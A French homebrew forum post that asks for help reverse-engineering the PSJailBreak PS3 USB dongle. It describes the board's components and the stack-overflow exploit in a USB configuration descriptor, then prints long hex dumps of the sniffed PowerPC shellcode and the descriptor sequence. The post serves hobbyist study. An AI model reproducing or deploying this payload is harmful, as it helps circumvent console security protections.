Index du forum: Le coin des homebrews » Développement

Index du forum: Le coin des homebrews » Développement

Aidez-nous pour la Rétro-Ingénierie du PSJailBreak

Bonjour, depuis peu, un membre de GX-Mod détient un excellent schéma. Pour essayer de reproduire schématiquement le PSJailBreak, nous aurons besoin de votre aide et de vos informations sur le PSJailBreak, le membre se nomme Xantra et un autre membre Neme6 de Logic-Sunrise en détient aussi.

Voici les informations que nous avons déjà :

PSJailBreak :
Procédé du Dump (extraction) possible du FirmWare du PSJailBreak :
Schéma du PSJailBreak :
Micro-Contrôleur ATMega164P/324P/644P… du PSJailBreak (Neme6):
Avant du PSJailBreak (Neme6) :

Composants (points rouges) :

A : Résistance ; 1 KΩ
B : D.E.L.
C : D.E.L.
D : Résistance ; 1 KΩ
E : Résistance
F : Condensateur
G : Résistance
H : Résistance 1KΩ (Résistance de tirage)
I : Condensateur
J : Condensateur ; 100nF (Condensateur de découplage)
K : Quartz (électronique)

En vert les pins (fiches) connectés.
En bleu les pins (fiches) probablement connectés.

De plus l’AN de AVR sur l’USB en SoftWare pourrait expliquer (cf. p.6) la présence des C et R sur les USB.D+ et USB.D- XD

Edit : Je me suis trompé sur le schéma ; les connections aux pins (fiches) 10 et 11 doivent être décalées aux pins (fiches) 9 et 10 (RX, TX).
Le point orange C est peut-être connecté au pin (fiche) 11 (pour INT0 au lien de INT1)

Nous devons ajouter une paire de Diodes Zeners pour protéger la prise USB (D + / D-usage 3,3 V !) Ou d’exécuter le Micro-Contrôleur de tension limitée.

En outre, le D-devrait être tiré vers le haut (Vcc) au lieu de vers le bas (GND). Et ne jamais utiliser de condensateur sur les lignes de données!

Arrière du PSJailBreak (Neme6) :
Schéma général du PSJailBreak (Xantra) :
Typon (Xantra) :

Schéma général du PSJailBreak (Xantra) et Typon (Xantra) sous KiCAD.

GameFreax a écrit:
Nous avons extrait la clé PSJailBreak afin de l’étudier plus précisément. Nous allons expliquer ici brièvement les principales étapes du processus interne du PSJailBreak.
Nous pouvons confirmer que c’est le PSJailbreak, et pas un clone de Sony « Jig » , que l’on a eu en mains. PSJailbrak est réellement un exploit en lui-même. La puce n’est pas un PIC18F444, mais un ATMega avec le logiciel USB. Cela signifie que la puce est capable de s’émuler de l’intérieur à travers l’USB. PSJailBreak se comporte principalement comme un HUB de 6 Port USB sur lesquels 6 appareils seraient connectés et déconnectés de nouveau. Un de ces dispositifs porte l’ID de Sony « Jig » module, ce qui signifie que le développement PSJailBreak « Jig » module a joué un certain rôle.
Mais commençons par ca: Quand la PS3 est allumée, l’émulation par usb permet donc à un périphérique USB d’être reconnu, ce qui permet de lui attribuer un assez gros fichier Descripteur de Configuration. ce dernier va alors faire déborder la pile de mémoire (gestion de processus dans la ps3) à l’aide d’un bout de code PowerPC, qui lui même sera exécuté! Un dispositif est mis en marche avec ce grand (0xAD) Descriptor, qui fait partie de l’exploit et contient des données statiques. Un peu plus tard (on parle de quelques millisecondes) le module JIG est connecté, et il ya données chiffrées qui sont transmises au module JIG. une éternité (en millisecondes) plus tard répond avec le module jig avec des données statiques de 64 octets, tous les périphériques USB sont déconnectés, un nouveau périphérique USB est connecté et la PS3 démarre ave ces données statistiques émulées auparavant organisées comme l’image en-dessous.
Quelques dump du PSJailBreak de Fidillo :
Shell Code du PSJailBreak « sniffé »

Descrambler, un membre de PS3Hax a « sniffé » le Shell Code contenant dans le PSJailBreak. Apparemment, le Code Shell se répète 32 fois et patch le LV2.

Les huit premiers octets proviennent du protocole USB à gauche [09 02 … ]

Le code sera envoyé quatre fois sur la pile de la PS3 :

Code:
09 02 12 00 01 00 00 80 FA 09 04 00 00 00 FE 01
02 00 00 00 00 00 00 00 FA CE B0 03 AA BB CC DD
38 63 F0 00 38 A0 10 00 38 80 00 01 78 84 F8 06
64 84 00 70 38 A5 FF F8 7C C3 28 2A 7C C4 29 2A
28 25 00 00 40 82 FF F0 38 84 00 80 7C 89 03 A6
4E 80 04 20 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
7C 08 02 A6 F8 21 FF 61 FB 61 00 78 FB 81 00 80
FB A1 00 88 FB C1 00 90 FB E1 00 98 F8 01 00 B0
3B E0 00 01 7B FF F8 06 7F E3 FB 78 64 63 00 05
60 63 0B 3C 7F E4 FB 78 64 84 00 70 60 84 01 AC
38 A0 04 FA 4B 97 BF 59 7F E3 FB 78 64 63 00 05
60 63 0B 3C 38 63 00 20 4B 9D 22 01 7F E3 FB 78
64 63 00 05 60 63 0B 3C 7F E4 FB 78 64 84 00 2E
60 84 B1 28 38 63 00 10 F8 64 01 20 7F E5 FB 78
64 A5 00 70 60 A5 01 50 80 65 00 00 28 03 00 00
41 82 00 18 80 85 00 04 7C 63 FA 14 90 83 00 00
38 A5 00 08 4B FF FF E4 48 00 05 88 F8 21 FF 51
7C 08 02 A6 FB C1 00 A0 FB E1 00 A8 FB A1 00 98
F8 01 00 C0 3B C0 07 D0 3B E0 00 C8 4B 90 A9 B8
00 04 90 E0 E8 82 0F 08 00 04 90 E4 E8 7C 00 20
00 04 90 E8 F8 64 00 00 00 04 F0 A8 48 00 1A 9D
00 2A AF C8 4B DA 5B 80 00 04 ED 18 38 80 00 00
00 04 ED 1C 90 83 00 00 00 04 ED 20 4E 80 00 20
00 3B A8 90 01 00 00 00 00 05 05 D0 38 60 00 01
00 05 05 D4 4E 80 00 20 00 00 00 00 38 60 00 01
4E 80 00 20 48 00 02 78 48 00 01 EC 80 00 00 00
00 05 0C A8 80 00 00 00 00 33 E7 20 80 00 00 00
00 05 10 32 80 00 00 00 00 05 0B 7C 80 00 00 00
00 05 0B 8C 80 00 00 00 00 05 0B 9C 80 00 00 00
00 05 0B D4 80 00 00 00 00 33 E7 20 80 00 00 00
00 05 0C 1C 80 00 00 00 00 33 E7 20 80 00 00 00
00 05 0C 78 80 00 00 00 00 33 E7 20 80 00 00 00
00 05 0C 84 80 00 00 00 00 33 E7 20 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 F8 21 FF 81 7C 08 02 A6 F8 01 00 90
38 80 00 00 38 A0 00 01 48 08 1D B1 80 A3 00 08
38 60 00 00 3C 80 AA AA 60 84 C0 DE 7C 04 28 40
41 82 00 08 38 60 FF FF 7C 63 07 B4 E8 01 00 90
7C 08 03 A6 38 21 00 80 4E 80 00 20 F8 21 FF 81
7C 08 02 A6 F8 01 00 90 38 80 00 00 48 08 1D 99
38 81 00 70 38 A0 00 00 F8 A4 00 00 38 C0 21 AA
B0 C4 00 00 38 C0 00 00 B0 C4 00 06 38 C0 00 01
78 C6 F8 06 64 C6 00 05 60 C6 0B AC 38 E0 00 00
48 08 1C CD 38 60 00 00 E8 01 00 90 7C 08 03 A6
38 21 00 80 4E 80 00 20 38 60 00 00 39 60 00 FF
44 00 00 22 2C 03 00 00 40 82 00 1C 38 60 00 01
78 63 F8 06 64 63 00 05 60 63 0B BC 38 80 00 01
90 83 00 10 4E 80 00 20 F8 21 FF 31 7C 08 02 A6
F8 01 00 E0 FB E1 00 C8 38 81 00 70 48 16 2E 81
3B E0 00 01 7B FF F8 06 67 FF 00 05 63 FF 0B BC
E8 7F 00 00 2C 23 00 00 41 82 00 0C 38 80 00 27
48 01 17 E9 38 80 00 27 38 60 08 00 48 01 13 9D
F8 7F 00 00 E8 81 00 70 4B FF C5 F9 E8 61 00 70
38 80 00 27 48 01 17 C5 E8 7F 00 00 4B FF C6 0D
E8 9F 00 00 7C 64 1A 14 F8 7F 00 08 38 60 00 00
EB E1 00 C8 E8 01 00 E0 38 21 00 D0 7C 08 03 A6
4E 80 00 20 F8 21 FF 61 7C 08 02 A6 FB 81 00 80
FB A1 00 88 FB E1 00 98 FB 41 00 70 FB 61 00 78
F8 01 00 B0 7C 9C 23 78 7C 7D 1B 78 3B E0 00 01
7B FF F8 06 7F A3 EB 78 7F E4 FB 78 64 84 00 05
60 84 10 28 38 A0 00 09 4B FF C5 CD 28 23 00 00
40 82 00 34 67 FF 00 05 63 FF 0B BC 80 7F 00 10
28 03 00 00 41 82 00 20 E8 7F 00 00 28 23 00 00
41 82 00 14 E8 7F 00 08 38 9D 00 09 4B FF C5 45
EB BF 00 00 7F A3 EB 78 48 25 A2 38 7C 08 02 A6
F8 21 FE 61 FB 61 00 78 FB 81 00 80 FB A1 00 88
FB C1 00 90 FB E1 00 98 F8 01 01 B0 7C 7D 1B 78
7C 9E 23 78 3B E0 00 01 7B FF F8 06 EB 82 96 00
EB 9C 00 68 EB 9C 00 18 EB 62 0F 08 E9 3D 00 18
81 29 00 30 79 29 84 02 2C 09 00 29 40 82 00 58
E8 9C 00 10 78 85 C1 E4 78 A5 46 20 2C 05 00 FF
41 82 00 18 60 84 00 03 F8 9C 00 10 38 60 00 06
90 7E 00 00 48 00 00 14 60 84 00 02 F8 9C 00 10
38 60 00 2C 90 7E 00 00 80 BC 00 04 E8 9C 00 08
E8 7B 00 00 7D 23 2A 14 F9 3B 00 00 48 02 B1 C1
48 00 00 C4 7F A3 EB 78 7F C4 F3 78 4B FF D9 B1
7F FD FB 78 67 BD 00 05 63 BD 0B D0 80 7D 00 00
80 BC 00 04 7C 63 2A 14 90 7D 00 00 E8 9C 00 10
78 85 C1 E4 78 A5 46 20 2C 05 00 FF 40 82 00 88
E8 7B 00 00 38 80 00 00 38 C0 00 00 7C E3 22 14
80 A7 00 00 7C C6 2A 78 38 84 00 04 28 24 04 00
40 82 FF EC 80 7D 00 00 78 C6 07 C6 7C C6 1B 78
38 60 00 00 90 7D 00 00 7F E7 FB 78 64 E7 00 05
60 E7 0F 70 E8 67 00 00 28 23 00 00 41 82 00 38
38 E7 00 10 7C 23 30 40 40 82 FF EC E8 A7 FF F8
E8 FB 00 00 80 65 00 00 28 03 00 00 41 82 00 18
80 85 00 04 7C 63 3A 14 90 83 00 00 38 A5 00 08
4B FF FF E4 38 60 00 00 EB 61 00 78 EB 81 00 80
EB A1 00 88 EB C1 00 90 EB E1 00 98 E8 01 01 B0
38 21 01 A0 7C 08 03 A6 4E 80 00 20 F8 21 FF 51
7C 08 02 A6 FB C1 00 A0 FB E1 00 A8 FB A1 00 98
F8 01 00 C0 3B C0 0F A0 3B E0 00 C8 4B FB 9B 98
A0 55 6F 3D 00 2C B8 FD 80 00 00 00 00 05 0F B8
8C 0A 94 8C 00 0D 99 B1 80 00 00 00 00 05 0F E0
A2 BC 1A 56 00 05 2A DC 80 00 00 00 00 05 10 04
6B 70 28 02 00 02 00 17 80 00 00 00 00 05 0F D4
00 00 00 00 00 00 00 00 00 30 53 54 38 60 00 82
00 5F 3F C0 38 60 00 01 00 5F 3F C4 4E 80 00 20
00 00 00 00 00 02 ED 0C 3B A0 00 01 00 00 00 00
00 22 B8 88 5F 74 6F 6F 00 22 B8 8C 6C 32 2E 78
00 22 B8 90 6D 6C 23 72 00 22 B8 94 6F 6F 74 00
00 00 00 00 00 0D 68 B8 5F 74 6F 6F 00 0D 68 BC
6C 32 2E 78 00 0D 68 C0 6D 6C 23 72 00 0D 68 C4
6F 6F 74 00 00 00 00 00 2F 64 65 76 5F 62 64 76
64 00 6D 6F 64 00 00 00 00 00 00 00 00 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90

Après cela, ce code est envoyé deux fois en branchant et en débranchant la pile USB du bus.

Code:
09 02 4D 0A 01 01 00 80 01 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
